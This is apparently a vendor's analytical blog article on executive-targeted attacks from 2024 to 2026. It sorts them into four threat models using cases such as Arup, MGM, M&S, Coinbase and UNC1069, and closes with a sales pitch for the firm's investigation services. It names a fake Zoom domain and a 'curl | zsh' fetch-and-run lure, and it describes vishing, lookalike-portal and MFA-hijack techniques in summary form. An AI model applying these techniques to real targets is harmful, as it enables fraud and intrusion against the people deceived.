In February 2024, a finance employee at the Hong Kong office of British engineering firm Arup joined a video call with people he believed were his CFO and several colleagues. He had received an email earlier requesting a confidential transaction, and the email had looked suspicious. The video call appeared to confirm everything. The voices were familiar. The faces were familiar. He authorised fifteen wire transfers in a single day, totalling HK$200 million, about $25.6 million. None of the people on the call were real. The CFO and the colleagues were deepfake reconstructions. None of the funds have been recovered.
What product was that company supposed to have bought?
"Executive cybersecurity" is sold as three different things by three different industries. Physical-security firms sell it as a digital extension of close-protection work. Enterprise cybersecurity vendors sell it as their existing platform with extra MFA on the CEO's laptop. Privacy-services firms sell it as personal IT support for VIPs: monitoring tools, broker scans, dark-web alerts. None of these three would have prevented what happened to Arup.
The reason is structural. Most "executive cybersecurity" buyers are choosing between products on a single axis: how thoroughly they monitor the executive's own accounts. But the attacks that have hurt executives in 2024 to 2026, the named ones in the news and the ones documented by Google's Threat Intelligence Group and Mandiant across a series of detailed reports, do not target the executive's accounts at all. They target the people, systems and identities adjacent to the executive. The executive's name, voice, image, role and career profile are the lock-pick. The executive's accounts are the trophy, not the door.
This piece walks four distinct threat models that get conflated under "executive cybersecurity," with the attacks that prove each one, and an analytical view of what investigation-led work does that product monitoring categorically cannot.
Four threat models, distinguished by where the executive sits
The taxonomy that matters is not the sophistication of the attacker. It is where the executive sits in the attack chain, and who the human target of the social engineering is.
Model 1: the executive is incidental
The largest category by volume. Commodity attacks (phishing campaigns sent to millions, infostealer malware seeded through cracked software downloads, automated credential-stuffing) catch the executive in the same net as everyone else. The executive's corporate credential ends up in a broker dump or a stealer log because their personal device was infected, because they reused a password, because a third-party site they used was breached.
This is the model "executive cybersecurity" products are best at addressing. Continuous credential monitoring, password-manager enforcement, MFA push-resistance training: all reasonable controls against an opportunistic threat. We covered the operational mechanics of this layer in how infostealers work in 2026.
The article's argument is not that this model is unimportant. It is that buyers stop here, treating opportunistic credential hygiene as the whole problem. Three further models are where the damage has actually landed.
Model 2: the executive is the path, directly targeted
Here the executive themselves is the human target of the social engineering. Their identity is the entry vector into the corporation.
In mid-May 2025, Trellix detected a spear-phishing campaign aimed at CFOs and financial executives at banks, energy companies, insurers and investment firms across Europe, Africa, Canada, the Middle East and South Asia. The phishing email impersonated a recruiter from Rothschild & Co., offering a "strategic opportunity." The lure was a PDF link routed through a Firebase-hosted URL. A VBScript fetched a payload renamed trm.zip, which contained two installers: NetBird (a legitimate remote-access tool) and OpenSSH. The intrusion created a hidden local account, enabled remote desktop access, and persisted NetBird through scheduled tasks. NetBird itself confirmed that 197 machines had been registered to the single malicious account before it was disabled.
The recruiter pretext only works because CFO career profiles are publicly readable. LinkedIn, executive-search-firm databases, financial press coverage of the executive's company, conference speaker bios: all combine into a profile that makes a Rothschild & Co. recruiter outreach plausible enough to click. We covered the corporate version of this surface in identity attack surface: what ASM vendors miss.
When this type of compromise lands, the consequences are not bounded by what the threat actor steals on day one. The Office of the Special Deputy Receiver, an Illinois non-profit that administers estates of insolvent insurance companies, lost approximately $6.85 million in 2021 after a hacker compromised the CFO's Outlook account and posed as him in emails directing wire transfers to staff. Eight transfers went out before the fraud was caught. The agency turned to its insurers. Hartford denied coverage. So did HSB Specialty.
In March 2025, the Northern District of Illinois ruled on the dispute. Office of the Special Deputy Receiver v. Hartford Fire Insurance Co., 2025 U.S. Dist. LEXIS 60484 (N.D. Ill. Mar. 31, 2025). The court granted Hartford's motion to dismiss on the grounds that an Electronic Mail Initiated Transfer Fraud Coverage exclusion (Rider 17) "unambiguously applied" to losses where the insured had transferred funds in good-faith reliance on a fraudulent email instruction. Coverage barred. The court denied HSB Specialty's motion on a separate Computer Fraud provision, leaving that question for trial, but HSB Specialty had also already disclosed a $250,000 sublimit on its Social Engineering provision, a fraction of the $6.85 million loss.
The reading: even when the consequence is unambiguously corporate financial loss, the path to it routinely runs through the executive's account. And the insurance market is increasingly excluding this category of loss from coverage. The product that pays out when the compromised executive's email costs the company millions may not exist anymore. That is a board-level fact and not one most "executive cybersecurity" buyers have factored.
Model 3: the executive is the personal target
In this model the executive themselves is the ultimate beneficiary of the attack damage: financial theft from the executive's holdings, extortion, doxxing, family threats, deepfake-driven personal attacks. What changes is that the entry vector often runs through a vendor or service provider, not the executive's accounts.
In May 2025, Coinbase disclosed in an SEC Form 8-K filing that cybercriminals had bribed overseas customer-support contractors to extract internal customer data, including names, email addresses, phone numbers, partially masked Social Security and bank account numbers, government-issued identity document images, and account activity history. Less than 1% of Coinbase's monthly transacting users were affected. On May 11, the attackers demanded a $20 million ransom in Bitcoin. On May 15, CEO Brian Armstrong publicly refused, and Coinbase offered a $20 million bounty for information leading to the attackers' arrest. Coinbase's SEC filing estimated remediation and customer-reimbursement costs at $180 million to $400 million. In December 2025, Bloomberg reported that a former agent had been arrested in India.
The structural point is not that Coinbase failed to protect its data, though that is also true. The structural point is that the executives holding crypto on Coinbase had no involvement in the compromise. Their own accounts and devices were untouched. The bribed insider extracted enough data (a real name, a partial bank number, an ID document image, account activity) to support directly targeted social engineering against those executive customers. A doxx attempt. A SIM-swap setup. A confidence call. A phishing email referencing recent legitimate transactions. The executive's monitoring tool, if they had one, would have shown nothing wrong.
This is the model in which the executive's posture toward their service providers is itself part of their threat surface: what jurisdictions hold their data, what custody arrangements expose them to insider risk, what cross-correlations a single vendor breach unlocks. We covered the underlying principle in the mosaic effect.
Model 4: the executive is the vector, used to attack adjacent humans
The largest category by damage in 2024 to 2026. The executive's identity, voice, image, role and relationships are used as pretexting fuel to socially engineer people around them: help desk staff, finance employees, vendor employees, family members. The executive's own accounts are often not the entry vector or the trophy. They are the lock-pick.
The pattern is now two and a half years old at scale. In September 2023, Scattered Spider used a LinkedIn-sourced employee identity to make a ten-minute phone call to MGM Resorts' IT help desk. The call yielded administrative access to MGM's Okta and Azure environments. The attack cost MGM approximately $100 million in third-quarter results, ten days of operational disruption, and ultimately a $45 million class-action settlement in January 2025.
In April 2025, the same playbook landed at Marks & Spencer. The attackers (Scattered Spider again, deploying DragonForce ransomware) first compromised Tata Consultancy Services, the outsourced contractor that ran M&S's IT help desk. M&S warned investors that the incident would shave roughly £300 million off its annual profit. Across the broader UK retail wave that spring, which also caught Co-op and Harrods, total damages have been reported between £270 million and £440 million.
Two years between MGM and M&S. The same playbook. The same verification gap. The defensive posture closed nowhere.
In January 2026, Google's Threat Intelligence Group documented the evolution of this pattern. GTIG tracked three threat clusters, UNC6661, UNC6671 and UNC6240, running a sophisticated variant. Attackers called employees pretending to be IT staff, directed them to lookalike SSO portals (<companyname>sso.com, my<companyname>internal.com, <companyname>okta.com), harvested credentials and MFA codes in real time, then registered their own device for MFA on the compromised account. To cover tracks, they enabled a legitimate Google Workspace add-on called ToogleBox Recall and permanently deleted the Okta "Security method enrolled" notification email, so that the employee would not see that a new device had been registered to their account. In at least one case, the threat actors then used the newly compromised email to send phishing emails to that employee's contacts at cryptocurrency-focused companies, deleting the outbound emails afterwards.
Mandiant's own framing of this activity: "This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, it continues to highlight the effectiveness of social engineering."
A second cluster, UNC6671, operated under the BlackFile brand between February and May 2026, targeting "dozens of organizations" across North America, Australia and the UK. Two operational details from Mandiant's May 2026 publication are worth holding. First: UNC6671 targeted employees' personal cellular phones, calling personal mobile numbers obtained through reconnaissance, to bypass corporate phone-system monitoring entirely. Second: extortion escalation included threatening voicemails to C-suite executives and swatting tactics against company personnel, the physical-safety threat that corporate cybersecurity tooling does not address. In one case, a single victim's SharePoint and OneDrive environments yielded over a million individual files exfiltrated.
The ecosystem in which all this sits is fragmented and fluid. Europol's 2026 Internet Organised Crime Threat Assessment recorded more than 120 active ransomware brands in 2025, with significant administrator and affiliate overlap across brands. In May 2025, IOCTA records, ShinyHunters tricked Salesforce customers into authorising a malicious application against their organisations' portals and exfiltrated over one billion customer records in total. In August 2025, the Scattered LAPSUS$ Hunters alliance was announced: a coalition between Scattered Spider, ShinyHunters and LAPSUS$, three groups already responsible for a documented thread of help-desk vishing, SIM-swapping, insider recruitment and social engineering against major technology, healthcare and retail companies. The brands are short-lived. The technique is not.
What monitoring sees versus what investigation finds
Most "executive cybersecurity" products are monitoring tools. They produce alerts when data appears in places it should not: a broker listing, a breach corpus, a dark-web channel, a leaked credential dump. This is useful for Model 1, the opportunistic category. It is structurally limited against the other three.
The limit shows up as four pairings. In each, monitoring sees the artifact. Investigation sees what the artifact enables.
Monitoring sees a people-search profile showing the executive's home address. Investigation sees the home address joined to the spouse's social-media check-ins, the children's school district from a yearbook PDF, the housekeeping service whose website lists the executive among its clients, and the property-tax records confirming the same residence, and recognises that this composite is sufficient to plan a physical visit or to construct a vishing pretext referencing a specific delivery the executive is expecting.
Monitoring sees a credential leak showing an executive's old password from a 2019 breach. Investigation sees that the same email was used to register an obscure conference forum where the executive disclosed which password manager they use, that the password follows a personal-template pattern reused with one-character variations across four other services in different leaks, and that two of those four services protect cryptocurrency wallets.
Monitoring sees a LinkedIn job-change. Investigation sees that the job-change opens a recruiter-pretexting window with predictable timing, that the executive's transition narrative makes a Rothschild & Co. "strategic opportunity" plausible for the next ninety days, and that the new corporate email format is now publicly inferrable from LinkedIn.
Monitoring sees a public conference photo. Investigation sees the executive's facial geometry now available in sufficient resolution for image-based tools, their voice from the recorded panel, the family pattern from the audience-shot they were tagged in, and the office layout visible through the window of a separate event photo.
Each pairing makes one point. The artifact is not the threat. The threat is what the artifact enables when joined to the other six things an investigator would find in ninety minutes. Monitoring categorically cannot do this joining work because the tools are not configured to. They are configured to alert on the artifact, not to interrogate its meaning.
Monitoring sees artifacts. Investigation sees what they enable. A Corporate Audit produces that joined view across executive, personnel and vendor exposure.
Talk to an AnalystThe corporate and personal seam
The CISO of any well-run company has dashboards on the executive's corporate identity surface: corporate laptop, corporate email, SSO logs, EDR telemetry, anomaly detection on privileged accounts. The CISO has no visibility into the executive's personal mobile number, home router, family devices, personal email accounts, breach corpora carrying the executive's personal data, broker records, public-registry filings, conference photos with EXIF metadata, the personal social media of the executive's spouse or adult children.
The executive is the highest-value individual target the CISO is responsible for protecting, and the one the CISO has the least visibility into.
The seam is bidirectional. Work-life events feed personal-side phishing pretexts: a quarterly results announcement creates a window for a fake-recruiter approach; an M&A disclosure creates a window for spear-phishing the executive's personal accounts. Personal-life events feed corporate-side social engineering: a divorce filing creates a vishing pretext; kids' Instagram geotags inform residential-threat planning; a vacation Instagram post creates a "boss is unreachable" BEC window during which a forged email request to staff is most plausible.
The BlackFile detail of attackers calling executives' personal mobile numbers is the seam in its purest form. Corporate phone-system controls (call recording, anomaly detection, blocked-number lists, MDM enforcement on corporate devices) have no application to a call placed to the executive's personal mobile.
The bidirectional pivot mechanics, how work-life events become personal-side phishing pretexts and how personal-life events become corporate-side social engineering, deserve their own treatment, and we will cover them in a dedicated piece. The point for now is that the seam exists, that it cannot be defended from one side, and that asking the CISO's team to defend it is asking them to do work they are structurally unequipped to do. The personal-corporate seam should be a separate remit, with its own posture, its own tooling, and its own analyst capacity.
What practitioner-led work actually does
Three concrete things, distinct from product monitoring.
Adversarial mapping of the public identity surface. The work an investigator would do in the first ninety minutes if the executive were the target. Identity-graph construction across data-broker records, breach corpora, registries, social-media footprint, photo and voice exposure, family and household linkages, vendor and service-provider relationships. The point is not to alert when something new appears. The point is to produce the document a directed adversary would produce, and then reduce it. We covered the principles in what does the internet know about you and the corporate analogue in identity attack surface: what ASM vendors miss.
Cross-correlation across exposure layers. The mosaic the threat actor builds is the threat. Single artifacts are not. The investigation work that produces value is the layer-joining work: address, spouse, school, travel, vendor, breach. A monitoring tool that alerts on the address does not produce the layer-joined view. An analyst constructing the view does. We covered the principle in the mosaic effect.
Active reduction with verification and re-emergence checks. Removal submissions tracked across categories, suppression-record discipline under Article 17(3)(b) of the GDPR, retroactive re-checks after re-emergence, escalation paths when a controller does not comply within the statutory window. This is methodological work, not a feature of a monitoring tool. We covered the mechanics for the credential layer in how a Lockdown investigation runs and the methodology for the people-search layer in how a Mirror investigation runs.
The four PI Solutions services map to four entry points into this work. The Mirror produces the adversarial map at a fixed scope in 48 hours: a snapshot of what an investigator finds across the public identity surface. The Lockdown investigates the credential and leak layer when there is reason to think a specific account or identity has been compromised or is being actively targeted. The Shield is for executives with active, named threats (stalking, targeted impersonation campaigns, ransom approaches against personal holdings) where ongoing protective work is needed. The Corporate Audit addresses the organisation-level version of the same problem, including the personnel-exposure layer that NIS2 requires regulated entities to assess and third-party risk including the supplier organisations whose compromise becomes the executive's compromise. We covered the regulatory framing in digital exposure as an NIS2 risk vector.
What is not on offer here is a SaaS product that "monitors" the executive. That model addresses Model 1 and does not address Models 2, 3 or 4. The work that does address them is investigative, analyst-led, and the same shape across organisations: map the surface, join the layers, reduce what can be reduced, watch what cannot, prepare for the call that comes anyway.
The cost of category error
The costs of the named incidents in this piece, summed:
- Arup deepfake (Model 4): $25.6 million in fraudulent wire transfers, none recovered.
- Trellix CFO recruiter campaign (Model 2): 197 machines compromised on a single malicious NetBird account; total downstream loss not publicly disclosed.
- Illinois OSDR (Model 2): $6.85 million in fraudulent transfers, $2.87 million recovered; insurance coverage denied under an Electronic Mail Initiated Transfer Fraud exclusion in March 2025.
- Coinbase (Model 3): $180 million to $400 million estimated remediation and customer reimbursement per SEC filing; $20 million ransom refused, $20 million bounty offered.
- MGM Resorts (Model 4 baseline): $100 million Q3 hit, $45 million class-action settlement.
- M&S (Model 4 evolution): £300 million annual profit hit; broader UK retail wave £270 million to £440 million.
- BlackFile UNC6671 (Model 4 current): over a million files exfiltrated from a single victim's SharePoint and OneDrive; total wave damages not yet aggregated.
Each of these costs is a category error. The product the company bought addressed a different threat model than the one that hit them. The defensive purchase passed an internal procurement check. The buyer was not unsophisticated. The category itself is broken.
When the threat actor is state-level
The four threat models hold across attacker sophistication. State-aligned adversaries do not occupy a fifth model; they operate within all four with greater patience, more resources, and fewer constraints on collateral damage.
In February 2026, Google's Threat Intelligence Group published an investigation of UNC1069, a financially motivated threat actor that GTIG suspects with high confidence has a North Korea nexus and that Mandiant has tracked since 2018. In a recent intrusion documented in the report, UNC1069 first compromised the Telegram account of a cryptocurrency company executive. That compromised account became the wedge. The threat actor used it to engage a second target, building rapport over Telegram and then sending a Calendly link to schedule a thirty-minute meeting.
The meeting routed to fake Zoom infrastructure (zoom.uswe05.us) hosted on attacker-controlled servers. During the call, the victim was shown a video of a CEO from another cryptocurrency company. A fake audio issue was used to redirect the victim to a "troubleshooting" web page that displayed commands like system_profiler SPAudioData and softwareupdate --evaluate-products embedded with a malicious curl | zsh payload. The victim executed the commands. Seven distinct malware families were deployed in the single intrusion, configured to harvest Keychain credentials, browser cookies and login data across Chrome, Brave and Edge, Telegram session data, and Apple Notes content from the compromised host.
GTIG's November 2025 publication on AI in threat-actor tradecraft recorded UNC1069's transition from "using AI for simple productivity gains to deploying novel AI-enabled lures in active operations." Kaspersky has reported overlap with a related DPRK-nexus actor, Bluenoroff, in using GPT-4o for image modification. The point is not that AI is now the threat. The point is that AI is now operational across the threat-actor stack, which means the cost of producing convincing pretexting material (a recruiter email, a brand-matched landing page, a colleague's voice on a phone call) has fallen.
Mandiant's framing of the UNC1069 intrusion is the closing argument of this article: "a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data."
The compromised executive's identity becomes the wedge into the next executive. The next executive's harvested data becomes the input to the next campaign. The cycle is operational across financially motivated criminal groups, state-aligned threat actors, and the tooling both have at their disposal. Buying a monitoring product to alert on artifact appearances does not interrupt this cycle.
Closing
Cybersecurity for executives is not a product category. It is an investigation discipline. The four threat models in this piece are not exotic. They are documented in the threat-intelligence reports of Mandiant, Google's Threat Intelligence Group, Trellix, Europol, and in the federal courts of the United States across the last twenty-four months. The pattern across them is consistent. The executive's name, voice, image, role, career profile, relationships and adjacent identities are the attack surface. The executive's own accounts are the trophy.
Sources
Threat intelligence reports
- Google Threat Intelligence Group — "Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft" (UNC6661, UNC6671, UNC6240; January 30, 2026)
- Google Threat Intelligence Group — "Inside the BlackFile Vishing Extortion Operation" (UNC6671; May 15, 2026)
- Google Threat Intelligence Group — UNC6692 'Snow Flurries' campaign analysis (April 23, 2026)
- Google Threat Intelligence Group — UNC1069 cryptocurrency-sector intrusion analysis (February 9, 2026)
- Trellix Research — "A Flyby on the CFO's Inbox: Spear-Phishing Campaign Targeting Financial Executives with NetBird Deployment" (June 2025)
- Europol — Internet Organised Crime Threat Assessment (IOCTA) 2026 (Scattered LAPSUS$ Hunters alliance August 2025; ShinyHunters Salesforce data theft May 2025; ransomware-brand fragmentation analysis)
Named incidents (press and primary sources)
- Fortune — "A deepfake 'CFO' tricked British design firm Arup in $25 million fraud"
- CNN Business — "Arup revealed as victim of $25 million deepfake scam involving Hong Kong employee"
- World Economic Forum — "Cybercrime: Lessons learned from a $25m deepfake attack"
- Coinbase — "Protecting Our Customers — Standing Up to Extortionists" (May 15, 2025; references SEC Form 8-K filing same date)
- CNBC — "Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom"
- Bloomberg — "Coinbase Says Former Agent Arrested in India After Exchange Hack"
- BleepingComputer — "MGM Resorts ransomware attack led to $100 million loss, data theft"
- The Hacker News — "Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages"
- Infosecurity Magazine — "Inside DragonForce, the Group Tied to M&S, Co-op and Harrods Hacks"
- Daily Security Review — "Scattered Spider Breached M&S via Third-Party TCS Credentials, Sources Confirm"
Legal
- Office of the Special Deputy Receiver v. Hartford Fire Insurance Co., 2025 U.S. Dist. LEXIS 60484 (N.D. Ill. Mar. 31, 2025). Simpson Thacher case alert summarising the court's holdings on the Electronic Mail Initiated Transfer Fraud exclusion (Rider 17) and the Computer Fraud / Social Engineering coverage dispute under separate carrier policies.